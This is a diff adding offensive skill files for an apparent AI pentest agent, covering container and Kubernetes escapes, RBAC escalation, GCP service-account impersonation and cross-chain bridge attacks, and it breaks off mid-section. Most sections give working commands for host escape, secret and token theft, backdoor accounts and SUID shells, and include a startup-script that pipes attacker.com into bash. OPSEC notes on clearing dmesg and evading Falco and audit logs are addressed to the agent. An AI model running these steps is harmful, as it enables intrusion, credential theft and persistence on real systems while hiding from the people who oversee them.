+description: "High-impact container-runtime CVE catalog — runC Leaky Vessels (CVE-2024-21626/-23651/-23652/-23653), CVE-2022-0185 (FUSE/legacy-fs), CVE-2019-5736 (runC binary replace), CRI-O Dirty COW analogs, Kubernetes API server CVE-2019-11247 (custom-resource RBAC bypass). Fingerprint → match → exploit."
+when_to_use: "container cve runc cve-2024-21626 leaky vessels cve-2019-5736 cve-2022-0185 fuse symlink containerd cri-o k8s api server"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: cloud-native
+  tags: container-runtime, cve, exploit
+  mitre_attack: T1068, T1190, T1611
+---
+
+# Container-Runtime CVE Catalog
+
+When you've identified a container target, fingerprint the runtime stack, then check this catalog for a working exploit. Newest first.
+
+## Fingerprint the stack
+
+```bash
+# Inside the target container
+cat /etc/os-release                  # base image
+cat /proc/version                     # host kernel
+docker version 2>/dev/null            # if you have client+socket
+ctr version 2>/dev/null
+runc --version 2>/dev/null
+# From kubelet metadata, if accessible:
+curl -k https://127.0.0.1:10250/runningpods | jq '.items[0].metadata'
+```
+
+## Catalog
+
+### CVE-2024-21626 — runC "Leaky Vessels" WORKDIR escape
+
+**Affects:** runC < 1.1.12, Docker < 25.0.3, containerd < 1.7.13, BuildKit < 0.12.5
+**Primitive:** WORKDIR pointing at `/proc/self/fd/N` (where N is an open kernel FD) lets the container CWD escape into the host filesystem.
+
+```bash
+# Build a malicious image
+cat > Dockerfile <<'EOF'
+FROM scratch
+WORKDIR /proc/self/fd/8
+COPY pwn /pwn
+ENTRYPOINT ["/pwn"]
+EOF
+# Then run on target. Public PoC: github.com/snyk/leaky-vessels-static-detector
+```
+
+### CVE-2024-23651/-23652/-23653 — BuildKit cache mount / RUN --mount escapes
+
+**Affects:** BuildKit < 0.12.5
+**Primitive:** Crafted Dockerfile uses cache or bind mounts to leak / overwrite host files during `docker build`.
+
+### CVE-2022-0185 — Linux FS context heap overflow
+
+**Affects:** Linux kernel < 5.16.2 (host kernel — affects every container running on it)
+**Primitive:** `fsopen()` syscall with a too-long string overflows the heap. CAP_SYS_ADMIN required, but trivial if the container has it.
+
+```bash
+# PoC: github.com/Crusaders-of-Rust/CVE-2022-0185
+# Container escape via kernel → host root.
+```
+
+### CVE-2019-5736 — runC binary overwrite
+
+**Affects:** runC < 1.0.0-rc6, Docker < 18.09.2
+**Primitive:** A malicious container can overwrite the runC binary on the host by exploiting how runC re-execs itself when handling `docker exec`.
+
+```bash
+# PoC: github.com/feexd/pocs/blob/master/CVE-2019-5736/
+# Still alive on old air-gapped + appliance fleets.
+```
+
+### CVE-2019-14271 — Docker cp library injection
+
+**Affects:** Docker < 19.03.1
+**Primitive:** `docker cp` loaded a libraries from inside the container, letting a malicious image overwrite `libnss_files.so.2` to RCE the docker daemon (= host root).
+
+### CVE-2018-15664 — Docker cp TOCTOU symlink race
+
+**Affects:** Docker < 18.09.3
+**Primitive:** Symlink race between `docker cp` resolving the source path and reading it lets you read/write arbitrary host files.
+
+### Kubernetes CVE-2019-11247 — CR vs CRD RBAC bypass
+
+**Affects:** Kubernetes 1.7–1.15
+**Primitive:** RBAC checks for CustomResources used the wrong API group, so a user with permission to a CR in one namespace could access CRs in any namespace.
+
+### CRI-O CVE-2022-0811 — kernel sysctl injection
+
+**Affects:** CRI-O 1.19+ through 1.23
+**Primitive:** Pod spec `securityContext.sysctls` accepted unescaped kernel parameters → container escape via `kernel.core_pattern`.
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: pwn
+spec:
+  containers:
+  - name: pwn
+    image: alpine
+    securityContext:
+      sysctls:
+      - name: "kernel.shm_rmid_forced=1+kernel.core_pattern=|/proc/%P/fd/255 %P"
+        value: "0"
+```
+
+## Workflow
+
+1. `cve_lookup` the runtime version (e.g., `runC 1.1.5`) and intersect with the catalog above.
+2. `cve_poc_lookup` for a working PoC.
+3. Try in a copy of the target environment first; container CVE exploits are often kernel-version-fragile.
+4. If exploit yields root on host → see `k8s-pod-escape` for the post-escape pivot.
+
+## OPSEC
+
+- All of these generate kernel audit / dmesg entries on success. dmesg ring buffer holds last ~1 MB — clear it (`dmesg -C`) if root.
+- The image-based exploits (WORKDIR, BuildKit) require pushing/pulling an attacker image — log line in image-pull events.
+
+## References
+
+- snyk.io/research/leaky-vessels — runC CVE-2024-21626 chain
+- Aqua Security "Cloud Native Attack Matrix" — recent CVE coverage
+- DEFCON 30 "Kernel Heap Exploitation" — CVE-2022-0185 deep dive

--- a/packages/decepticon/decepticon/skills/standard/cloud/container/docker-socket-mount/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/container/docker-socket-mount/SKILL.md
@@ -1,0 +1,93 @@
+---
+name: docker-socket-mount
+description: "Docker / containerd socket mounted into a container → host RCE. Common in CI runners, GitOps controllers (ArgoCD, Flux), and 'Docker-in-Docker' setups. Single-command escape via `docker run --rm --privileged -v /:/host alpine chroot /host`."
+when_to_use: "docker.sock containerd.sock dind docker-in-docker mounted socket /var/run host escape ci runner argocd flux jenkins gitlab"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: cloud-native
+  tags: docker, containerd, container-escape, ci-cd
+  mitre_attack: T1611, T1610
+---
+
+# Docker / Containerd Socket Mount Escape
+
+A container with `/var/run/docker.sock` or `/run/containerd/containerd.sock` mounted in is fully equivalent to root on the host. This is one of the most common findings in CI/CD environments.
+
+## Detect
+
+```bash
+ls -la /var/run/docker.sock /run/docker.sock /var/run/containerd/containerd.sock /run/containerd/containerd.sock 2>&1 | grep -v 'No such'
+mount | grep -E 'docker\.sock|containerd\.sock'
+# CRI-O variant
+ls -la /var/run/crio/crio.sock 2>&1
+```
+
+## Exploit — Docker socket
+
+```bash
+# Launch a privileged container that mounts the host root
+docker run --rm -it --privileged -v /:/host alpine chroot /host /bin/sh
+# Done — you're root on the host.
+
+# If `docker` binary isn't in your container, install it or talk to the API directly:
+apk add docker-cli 2>/dev/null || apt-get install -y docker.io 2>/dev/null
+
+# Or use curl on the UNIX socket:
+curl --unix-socket /var/run/docker.sock -X POST -H 'Content-Type: application/json' \
+  -d '{"Image":"alpine","Cmd":["chroot","/host","/bin/sh","-c","id > /host/tmp/owned"],"HostConfig":{"Binds":["/:/host"],"Privileged":true}}' \
+  http://localhost/containers/create
+```
+
+## Exploit — containerd socket
+
+```bash
+# ctr is the containerd CLI
+ctr -a /run/containerd/containerd.sock images pull docker.io/library/alpine:latest
+ctr -a /run/containerd/containerd.sock run --rm -t --privileged \
+  --mount type=bind,src=/,dst=/host,options=rbind \
+  docker.io/library/alpine:latest escape sh -c 'chroot /host'
+
+# OR via crictl (often present where ctr isn't):
+crictl --runtime-endpoint unix:///run/containerd/containerd.sock pull alpine
+# crictl exec is more limited — fall back to API:
+nerdctl --address /run/containerd/containerd.sock run --rm -it --privileged -v /:/host alpine chroot /host
+```
+
+## Exploit — CRI-O socket
+
+```bash
+crictl --runtime-endpoint unix:///var/run/crio/crio.sock pods
+# Same pattern as containerd.
+```
+
+## Common attack contexts
+
+| Context | Why the socket is mounted |
+|---|---|
+| Jenkins/GitLab CI runners | Build Docker images inside the build container |
+| ArgoCD / Flux | Run pre-/post-sync hooks that build images |
+| Docker-in-Docker (DinD) in K8s | Same — build pipelines, kaniko alternatives |
+| Diagnostic sidecars | Container-level metrics/log shippers |
+| Buildkit daemon w/ ungated rootless socket | Same primitive, less restricted env |
+
+## Persistence
+
+```bash
+# Inside the escaped host, drop a backdoor:
+chroot /host useradd -ou 0 -g 0 -m -s /bin/bash backdoor
+echo 'backdoor:plaintext' | chroot /host chpasswd
+# Or grant SUID:
+cp /host/bin/bash /host/tmp/.x; chroot /host chmod +s /tmp/.x
+```
+
+## OPSEC
+
+- The Docker API logs every container create (`/var/log/docker.log` or journald). Use a benign-sounding image name.
+- Falco rules `attach_drop_capability`, `escape_to_host_namespace` flag this exactly. If Falco is present, use the long-form HTTP API call (one request) rather than `docker run` (multiple).
+- CRI-O auditing logs every `RunPodSandbox` — same evasion approach.
+
+## Detection (defender lens, useful for triage)
+
+- Pod-spec scanning (admission controllers — OPA Gatekeeper, Kyverno) blocks `hostPath: /var/run/docker.sock` at admit time.
+- Falco rule `Mount docker.sock` catches the runtime case.
+- AppArmor profile `docker-default` doesn't block this — needs custom profile.

--- a/packages/decepticon/decepticon/skills/standard/cloud/container/k8s-pod-escape/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/container/k8s-pod-escape/SKILL.md
@@ -1,0 +1,162 @@
+---
+name: k8s-pod-escape
+description: "Kubernetes pod escape to node — privileged container abuse, hostPath mount escape, hostPID/hostIPC, capability misuse (SYS_ADMIN, SYS_PTRACE), runC CVE chains. Pivots from RCE-in-pod to full node compromise."
+when_to_use: "kubernetes k8s pod escape container break out hostpath privileged hostpid hostipc capabilities cgroups runc cve-2022-0185 cve-2024-21626 leaky vessels"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: cloud-native
+  tags: kubernetes, container-escape, privilege-escalation, hostpath
+  mitre_attack: T1611, T1068, T1610
+---
+
+# Kubernetes Pod Escape to Node
+
+You have RCE inside a pod. Goal: break out of the container to the underlying node, then pivot to the cluster.
+
+## Phase 1: Enumerate the container
+
+```bash
+# Identify how you're contained
+cat /proc/self/status | grep -E '^(Cap|Seccomp|NoNewPriv)'
+cat /proc/1/status | grep -i cap
+mount | grep -E 'cgroup|hostpath|/var/run/docker.sock|/var/run/crio'
+ls -la /dev | head -20
+id
+hostname
+
+# Service-account token
+cat /var/run/secrets/kubernetes.io/serviceaccount/token | head -c 60
+cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
+
+# Token + APIserver — confirm you can talk to the API
+TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+curl -sk -H "Authorization: Bearer $TOKEN" https://kubernetes.default.svc/api/v1/namespaces/default/pods
+```
+
+## Phase 2: Detect escape primitives (check each, escalate via the first that works)
+
+### 2.1 Privileged container
+
+```bash
+# Privileged = full host kernel access. CapEff: 0000003fffffffff is the giveaway.
+grep CapEff /proc/self/status
+# 0000003fffffffff or "ALL" → you're privileged. /dev/sda1, /dev/kmsg etc are visible.
+ls -la /dev/sda* /dev/nvme*
+
+# Mount host filesystem:
+mkdir /mnt/host
+mount /dev/sda1 /mnt/host          # adjust device — `lsblk` to confirm
+chroot /mnt/host /bin/bash
+# Now you're root on the node.
+```
+
+### 2.2 hostPath mount to / or /etc or /var/run/docker.sock
+
+```bash
+# Look for suspicious mounts
+mount | grep -E '/host|/node|docker.sock|/etc|/root'
+# /var/lib/kubelet mounted? You can read every other pod's secrets.
+ls /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/ 2>/dev/null
+
+# /var/run/docker.sock or /run/containerd/containerd.sock mounted = node compromise
+docker -H unix:///var/run/docker.sock run --rm -it --privileged -v /:/host alpine chroot /host
+ctr -a /run/containerd/containerd.sock run --rm -t --privileged --mount type=bind,src=/,dst=/host,options=rbind alpine escape sh -c 'chroot /host'
+```
+
+### 2.3 hostPID + SYS_PTRACE (no privileged needed)
+
+```bash
+# hostPID lets you see all node processes
+ps auxf | head
+# SYS_PTRACE in CapEff lets you inject into them
+grep CapEff /proc/self/status
+# 0000000000080000 includes CAP_SYS_PTRACE
+
+# Find a host-side root process and inject a shell
+nsenter -t 1 -m -u -i -n -p sh
+# 'nsenter -t 1' enters PID 1's namespaces — that's the host's init on a node with hostPID
+```
+
+### 2.4 CAP_SYS_ADMIN without --privileged
+
+```bash
+# Common in CI/CD runners (Docker-in-Docker patterns)
+grep CapEff /proc/self/status   # 00000000a82425fb or similar with bit 21 set
+
+# cgroup_release_agent escape (kernel < 5.8 on hosts without user-NS isolation)
+mkdir /tmp/x && mount -t cgroup -o memory cgroup /tmp/x
+echo 1 > /tmp/x/notify_on_release
+host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
+echo "$host_path/cmd" > /tmp/x/release_agent
+cat > /cmd <<'EOF'
+#!/bin/sh
+ip a > /tmp/host_ip
+id > /tmp/host_id
+EOF
+chmod +x /cmd
+sh -c "echo \$\$ > /tmp/x/cgroup.procs"
+# /tmp/host_id now contains the HOST's id output
+```
+
+### 2.5 runC CVE chain (CVE-2024-21626 "Leaky Vessels")
+
+If runC < 1.1.12 / Docker < 25.0.3 / containerd < 1.7.13: WORKDIR + symlink trickery lets a malicious image escape. Check node runC version via the kubelet API or by reading `/etc/docker/version` if exposed.
+
+```bash
+# Build a malicious image
+cat > Dockerfile <<'EOF'
+FROM scratch
+WORKDIR /proc/self/fd/8
+ENTRYPOINT ["/bin/sh"]
+EOF
+docker build -t evil .
+# Then run on target node — the WORKDIR points fd 8 (an open kernel FD) → host FS access
+docker run --rm -it evil
+```
+
+### 2.6 Service-account token → API server abuse
+
+If the SA has `pods/exec` on a privileged pod or `nodes/proxy` on the node:
+
+```bash
+TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+# List privileged pods
+curl -sk -H "Authorization: Bearer $TOKEN" \
+  https://kubernetes.default.svc/api/v1/pods?fieldSelector=spec.securityContext.privileged=true
+
+# Or: SA has `create pods` on kube-system → run a privileged pod yourself
+kubectl --token="$TOKEN" --server=https://kubernetes.default.svc \
+  --insecure-skip-tls-verify run pwn --image=alpine \
+  --overrides='{"spec":{"hostPID":true,"hostNetwork":true,"containers":[{"name":"pwn","image":"alpine","command":["nsenter","-t","1","-m","-u","-i","-n","-p","sh"],"securityContext":{"privileged":true},"volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"name":"host","hostPath":{"path":"/"}}]}}'
+```
+
+## Phase 3: Post-escape on node
+
+Once you're on the node, pivot to the cluster:
+
+```bash
+# Steal every pod's SA token
+find /var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token -exec cat {} \; -exec echo --- \;
+
+# Steal kubelet kubeconfig (cluster-admin-equivalent on many clusters)
+cat /etc/kubernetes/kubelet.conf
+
+# Read all pod secrets from etcd if running on a master node
+ETCDCTL_API=3 etcdctl --endpoints=127.0.0.1:2379 \
+  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
+  --cert=/etc/kubernetes/pki/etcd/healthcheck-client.crt \
+  --key=/etc/kubernetes/pki/etcd/healthcheck-client.key \
+  get / --prefix --keys-only | grep secrets
+```
+
+## OPSEC
+
+- Pod escapes generate AppArmor / SELinux / seccomp denials. Check `dmesg | tail` for telemetry.
+- Kubernetes audit log records every API call from your stolen tokens. Use the existing pod's token for low-noise enumeration before forging new tokens.
+- Falco rules detect `nsenter`, `mount` from container, and `chroot` outside the container. Quiet variants: write the payload to a host-shared volume and exec from a benign-looking process name.
+
+## References
+
+- Trail of Bits "Leaky Vessels" writeup — CVE-2024-21626 / CVE-2024-23651 / CVE-2024-23652 / CVE-2024-23653
+- DEFCON 29 "Kubernetes Goat" — Madhu Akula
+- BountyHunter rule sets — Trivy, Kubescape, Kube-Hunter for defender perspective

--- a/packages/decepticon/decepticon/skills/standard/cloud/container/k8s-rbac-abuse/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/container/k8s-rbac-abuse/SKILL.md
@@ -1,0 +1,176 @@
+---
+name: k8s-rbac-abuse
+description: "Kubernetes RBAC privilege escalation paths — ClusterRole/Role enumeration via `kubectl auth can-i --list`, abuse of pods/exec, pods/portforward, secrets get, escalate verb, bind verb, impersonate verb, system:masters group abuse, ServiceAccount token theft and reuse."
+when_to_use: "kubernetes k8s rbac role privilege escalation can-i pods/exec secrets list escalate bind impersonate serviceaccount cluster-admin system:masters"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: cloud-native
+  tags: kubernetes, rbac, privilege-escalation, authorization
+  mitre_attack: T1078.004, T1098.003, T1552.005
+---
+
+# Kubernetes RBAC Privilege Escalation
+
+You have a Kubernetes ServiceAccount token (from a pod escape, kubeconfig leak, or compromised CI runner). Find the path from this SA to cluster-admin.
+
+## Phase 1: Enumerate current permissions
+
+```bash
+TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+NS=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
+APISERVER=https://kubernetes.default.svc
+
+# Set up kubectl with the stolen token
+kubectl config set-credentials hacked --token="$TOKEN"
+kubectl config set-cluster c --server=$APISERVER --insecure-skip-tls-verify
+kubectl config set-context c --cluster=c --user=hacked --namespace=$NS
+kubectl config use-context c
+
+# Enumerate everything you can do
+kubectl auth can-i --list                    # in your namespace
+kubectl auth can-i --list --all-namespaces   # cluster-wide (often forbidden — that's a signal too)
+kubectl auth can-i '*' '*' --all-namespaces  # are you cluster-admin?
+
+# Get your role bindings
+kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]?.name | contains("YOUR_SA_NAME"))'
+```
+
+## Phase 2: Classic escalation paths
+
+### 2.1 `pods/exec` or `pods/attach` on a privileged pod
+
+If you can `exec` into a pod that has a privileged SecurityContext or a sensitive volume mount, you take that pod's identity:
+
+```bash
+# Find pods you can exec into
+kubectl auth can-i create pods/exec
+# Find privileged pods
+kubectl get pods -A -o json | jq '.items[] | select(.spec.containers[]?.securityContext?.privileged == true) | "\(.metadata.namespace)/\(.metadata.name)"'
+
+# Exec → escape (see k8s-pod-escape skill)
+kubectl exec -it -n kube-system privileged-pod-name -- /bin/sh
+```
+
+### 2.2 `secrets get/list` cluster-wide
+
+```bash
+# Dump every secret in the cluster
+kubectl get secrets -A -o json > all_secrets.json
+# Service-account tokens, image-pull secrets, custom-application secrets — all here
+jq -r '.items[] | select(.type=="kubernetes.io/service-account-token") | "\(.metadata.namespace)/\(.metadata.name): \(.data.token | @base64d)"' all_secrets.json | head
+
+# Pick a more-privileged SA token and re-authenticate
+NEW_TOKEN=$(kubectl get secret -n kube-system $(kubectl get sa -n kube-system -o name | head -1 | cut -d/ -f2)-token-XXXXX -o jsonpath='{.data.token}' | base64 -d)
+kubectl --token="$NEW_TOKEN" auth can-i '*' '*' --all-namespaces
+```
+
+### 2.3 `create pods` — run a privileged pod yourself
+
+Even without exec on existing pods, if you can CREATE pods you can build one that mounts the host:
+
+```bash
+cat <<EOF | kubectl apply -f -
+apiVersion: v1
+kind: Pod
+metadata:
+  name: pwn
+spec:
+  hostPID: true
+  hostNetwork: true
+  containers:
+  - name: pwn
+    image: alpine
+    command: ["nsenter", "-t", "1", "-m", "-u", "-i", "-n", "-p", "sh"]
+    securityContext:
+      privileged: true
+    volumeMounts:
+    - name: host
+      mountPath: /host
+  volumes:
+  - name: host
+    hostPath:
+      path: /
+EOF
+kubectl exec -it pwn -- /bin/sh
+```
+
+If PSP / Pod Security Admission blocks `privileged: true`, downgrade gradually: hostPath: /, hostPID alone, capabilities: [SYS_ADMIN], etc. PSA's `restricted` profile blocks all of these; `baseline` blocks privileged + hostPath but allows hostPID; `privileged` allows everything.
+
+### 2.4 `escalate` verb
+
+The `escalate` verb on `roles`/`clusterroles` lets you create a role with permissions you DON'T have:
+
+```bash
+kubectl auth can-i escalate clusterroles
+# If "yes":
+cat <<EOF | kubectl apply -f -
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: total-pwn
+rules:
+- apiGroups: ["*"]
+  resources: ["*"]
+  verbs: ["*"]
+EOF
+# Then bind it to your SA
+kubectl create clusterrolebinding pwn --clusterrole=total-pwn --serviceaccount=$NS:default
+```
+
+### 2.5 `bind` verb
+
+The `bind` verb lets you bind an existing higher-privilege ClusterRole to your SA:
+
+```bash
+kubectl auth can-i create clusterrolebindings
+# OR
+kubectl auth can-i bind clusterroles
+# Either gives you escalation to cluster-admin:
+kubectl create clusterrolebinding pwn --clusterrole=cluster-admin --serviceaccount=$NS:default
+```
+
+### 2.6 `impersonate` verb
+
+```bash
+kubectl auth can-i impersonate users
+# If yes, impersonate cluster-admin:
+kubectl --as=system:admin auth can-i '*' '*' --all-namespaces
+kubectl --as=system:admin get secrets -A
+# Or impersonate a group:
+kubectl --as=anything --as-group=system:masters get secrets -A
+```
+
+### 2.7 `nodes/proxy` — bypass RBAC via kubelet
+
+```bash
+kubectl auth can-i get nodes/proxy
+# If yes, talk to the kubelet directly (bypasses the API server's RBAC)
+kubectl proxy --port=8080 &
+curl -sk http://localhost:8080/api/v1/nodes/$NODE/proxy/run/POD_NS/POD_NAME/CONTAINER -X POST -d 'cmd=id'
+```
+
+## Phase 3: Token persistence
+
+```bash
+# Create a long-lived SA token (k8s 1.24+ doesn't auto-mount tokens forever)
+kubectl create token your-sa --duration=720h    # 30-day token
+
+# Or create an SA + ClusterRoleBinding pair that survives revocation of yours
+kubectl create sa backdoor -n kube-system
+kubectl create clusterrolebinding backdoor --clusterrole=cluster-admin --serviceaccount=kube-system:backdoor
+TOKEN=$(kubectl create token backdoor -n kube-system --duration=8760h)   # 1 year
+```
+
+## OPSEC
+
+- Every `kubectl` call hits the API server audit log. `kubectl auth can-i --list` calls SelfSubjectRulesReview — distinctive in audit logs.
+- Falco and Sysdig rules flag `create-clusterrolebinding`, `impersonate`, and `nodes/proxy` access.
+- Token theft from etcd / pod-filesystem leaves no audit trail until the token is USED — separate the steal and the use in time if possible.
+- Prefer `--user-agent` matching the kubectl version already in use on the cluster to blend in.
+
+## References
+
+- [Kubernetes RBAC docs](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
+- BadPods (Bishop Fox) — every PSA bypass class
+- DEFCON 30 "Hacking Kubernetes" — Madhu Akula / Andrew Martin
+- KubiScan — tools for the defender side

--- a/packages/decepticon/decepticon/skills/standard/cloud/gcp-svc-account-impersonation/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/cloud/gcp-svc-account-impersonation/SKILL.md
@@ -1,0 +1,133 @@
+---
+name: gcp-svc-account-impersonation
+description: "GCP service account impersonation chain — IAM `roles/iam.serviceAccountTokenCreator`, `roles/iam.serviceAccountUser`, `actAs` on Cloud Functions / Cloud Run / Compute Engine. Pivot from low-priv SA to org-admin via chained impersonation."
+when_to_use: "gcp google cloud service account impersonation token creator actAs roles/iam compute cloud functions cloud run workload identity"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: cloud
+  tags: gcp, iam, service-account, privilege-escalation
+  mitre_attack: T1078.004, T1098, T1550.001
+---
+
+# GCP Service Account Impersonation
+
+You have a GCP token (compromised VM metadata, leaked service account key, gcloud SDK). Find the impersonation chain to higher privilege.
+
+## Steal the token
+
+### From GCE / GKE / Cloud Run / Functions
+```bash
+TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
+  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
+  | jq -r .access_token)
+
+# All service accounts on the VM:
+curl -s -H "Metadata-Flavor: Google" \
+  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"
+```
+
+### From a leaked key.json
+```bash
+gcloud auth activate-service-account --key-file=key.json
+TOKEN=$(gcloud auth print-access-token)
+```
+
+## Phase 1: Enumerate current permissions
+
+```bash
+# Which projects are you in?
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://cloudresourcemanager.googleapis.com/v1/projects" | jq -r '.projects[].projectId'
+
+# What can you do in a project?
+PROJECT=$(gcloud config get-value project)
+gcloud projects test-iam-permissions "$PROJECT" \
+  --permissions=$(curl -s https://iam.googleapis.com/v1/permissions:queryTestablePermissions -X POST -H "Authorization: Bearer $TOKEN" -d "{\"fullResourceName\":\"//cloudresourcemanager.googleapis.com/projects/$PROJECT\"}" | jq -r '.permissions[].name' | tr '\n' ',' | sed 's/,$//')
+
+# Or use the bucket-list shortcut (most SAs can list):
+gcloud projects get-iam-policy "$PROJECT" --format=json | jq '.bindings[]'
+```
+
+## Phase 2: Impersonation primitives
+
+### `roles/iam.serviceAccountTokenCreator`
+If you have `iam.serviceAccounts.getAccessToken` on a higher-priv SA:
+
+```bash
+gcloud auth print-access-token --impersonate-service-account=highpriv@PROJECT.iam.gserviceaccount.com
+# OR raw:
+curl -s -X POST -H "Authorization: Bearer $TOKEN" \
+  -H "Content-Type: application/json" \
+  -d '{"scope":["https://www.googleapis.com/auth/cloud-platform"]}' \
+  "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/highpriv@PROJECT.iam.gserviceaccount.com:generateAccessToken" \
+  | jq -r .accessToken
+```
+
+### `iam.serviceAccountKeys.create`
+Mint a permanent JSON key for any SA you can act-on:
+
+```bash
+gcloud iam service-accounts keys create /tmp/k.json \
+  --iam-account=target@PROJECT.iam.gserviceaccount.com
+# Long-lived credential — survives token rotation.
+```
+
+### `cloudfunctions.functions.update` + `actAs`
+Deploy a function that runs AS a more-priv SA:
+
+```bash
+mkdir fn && cat > fn/main.py <<'EOF'
+def pwn(request):
+    import subprocess
+    out = subprocess.check_output("curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token", shell=True)
+    return out
+EOF
+echo "" > fn/requirements.txt
+gcloud functions deploy pwn --source=fn --runtime=python311 --trigger-http --allow-unauthenticated \
+  --service-account=highpriv@PROJECT.iam.gserviceaccount.com --entry-point=pwn
+# Then HTTP-call it to get the higher-priv token
+```
+
+### `compute.instances.setMetadata`
+Inject a `startup-script` that runs as the VM's SA on next boot:
+
+```bash
+gcloud compute instances add-metadata target-vm --zone=us-central1-a \
+  --metadata=startup-script='curl -fsSL https://attacker.com/x.sh | bash'
+gcloud compute instances reset target-vm --zone=us-central1-a
+```
+
+### `compute.projects.setCommonInstanceMetadata`
+Project-wide metadata = SSH key on every VM in the project:
+
+```bash
+ssh-keygen -t ed25519 -f ./pwn -N ''
+gcloud compute project-info add-metadata --metadata=ssh-keys="root:$(cat pwn.pub)"
+```
+
+## Phase 3: Cross-project pivot
+
+```bash
+# If your token has `resourcemanager.organizations.get`, you can see the org tree
+curl -s -H "Authorization: Bearer $TOKEN" \
+  "https://cloudresourcemanager.googleapis.com/v1/organizations" | jq .
+
+# Find SAs with cross-project bindings
+for p in $(gcloud projects list --format='value(projectId)'); do
+  echo "=== $p ==="
+  gcloud projects get-iam-policy "$p" --format=json | jq -r '.bindings[] | "\(.role): \(.members | join(","))"'
+done
+```
+
+## OPSEC
+
+- Every IAM call logs to Cloud Audit Logs. SetMetadata + Reset is loud — prefer ImpersonateSA when possible.
+- Token TTL 60min. Refresh from the same IMDS endpoint (no log) vs. requesting a new SA token (logged).
+- Key creation creates a Cloud Audit `google.iam.admin.v1.CreateServiceAccountKey` event — high-fidelity detection.
+- GCP Security Command Center flags startup-script changes — for evasion, set metadata on a service NOT under SCC monitoring.
+
+## References
+
+- gcp_enum / GCP IAM Privilege Escalation by RhinoSecurityLabs
+- "Big GCP IAM Privilege Escalation List" — Praetorian
+- DEFCON 27 "Privilege Escalation in GCP" — Spencer Gietzen

--- a/packages/decepticon/decepticon/skills/standard/contracts/bridge-exploit/SKILL.md
+++ b/packages/decepticon/decepticon/skills/standard/contracts/bridge-exploit/SKILL.md
@@ -1,0 +1,114 @@
+---
+name: contracts-bridge-exploit
+description: "Cross-chain bridge attack — message-validation bypass (Wormhole class), validator key compromise (Ronin / Harmony class), reentrancy on token-bridge claim, Merkle-proof forgery on optimistic bridges, signature replay across chains. Bridges have lost >$2B; understand why."
+when_to_use: "bridge cross-chain wormhole ronin harmony nomad multichain anyswap layerzero axelar relayer validator merkle optimistic"
+allowed-tools: Bash Read Write
+metadata:
+  subdomain: contracts
+  tags: defi, bridge, cross-chain, validator
+  mitre_attack: T1190, T1565
+---
+
+# Cross-Chain Bridge Attack
+
+Bridges hold large pooled assets and execute messages from a separate trust layer. Architecturally fragile.
+
+## Bridge taxonomy
+
+| Type | Trust model | Past exploits |
+|---|---|---|
+| **Lock-and-mint** | Trusted validators sign mint events | Wormhole ($325M), Ronin ($600M), Harmony ($100M) |
+| **Burn-and-redeem** | Same | Multichain/Anyswap ($126M) |
+| **Optimistic** | Fraud proof window | Nomad ($190M) |
+| **Light-client / zk** | Cryptographic | (Fewer hacks, but newer) |
+| **Liquidity-network (Hop, Connext)** | Routers + relayers | Smaller individual exploits |
+
+## Attack classes
+
+### 1. Validator-signature bypass (Wormhole, Feb 2022, $325M)
+The Solana-side `verify_signature` function trusted the caller to provide a "verified" sigset account. Attacker passed a sysvar that wasn't a real sigset → unauthorized mint of 120k wETH.
+
+**Lesson:** any verify function whose input is a struct fetched by address is bypassable if address-trust is missing.
+
+### 2. Validator key compromise (Ronin, March 2022, $600M)
+9-of-9 validators, 5 of which were operated by one entity. Sky Mavis got phished → attacker controlled 5 keys → arbitrary mint.
+
+**Lesson:** validator decentralization isn't math, it's operational. Count distinct legal entities and key-storage methods, not just keys.
+
+### 3. Merkle-proof forgery (Nomad, August 2022, $190M)
+After an upgrade, the zero-hash was set as a "valid root" — any proof against root = 0 passed. The first attacker withdrew real funds; then thousands of others copy-pasted the same tx with their own address. ~$190M total.
+
+**Lesson:** check initialize / upgrade scripts for accidental defaults — `bytes32(0)`, `address(0)`, `1` (often the most-tested value) becoming the trusted value.
+
+### 4. Replay across chains (Multichain class)
+Bridge tx signed for chain A is replayed on chain B because chainId wasn't bound into the signed message:
+
+```solidity
+function claim(bytes32 nonce, uint256 amount, bytes calldata sig) external {
+    bytes32 hash = keccak256(abi.encode(nonce, msg.sender, amount));   // ⚠ no chainId
+    require(ecrecover(hash, ...) == validator);
+    token.transfer(msg.sender, amount);
+}
+// On chain A: legit claim
+// On chain B (same validator, same token): replay the same sig
+```
+
+### 5. Reentrancy on bridge claim
+Claim transfers tokens THEN updates nonce-used mapping:
+
+```solidity
+function claim(...) external {
+    token.transfer(msg.sender, amount);       // attacker token w/ callback
+    used[nonce] = true;                        // updated AFTER
+}
+// ERC777 / ERC1363 / malicious ERC20 callback → re-enter claim same nonce
+```
+
+### 6. Liquidity-pool draining via fee oracle (Hop / Across class)
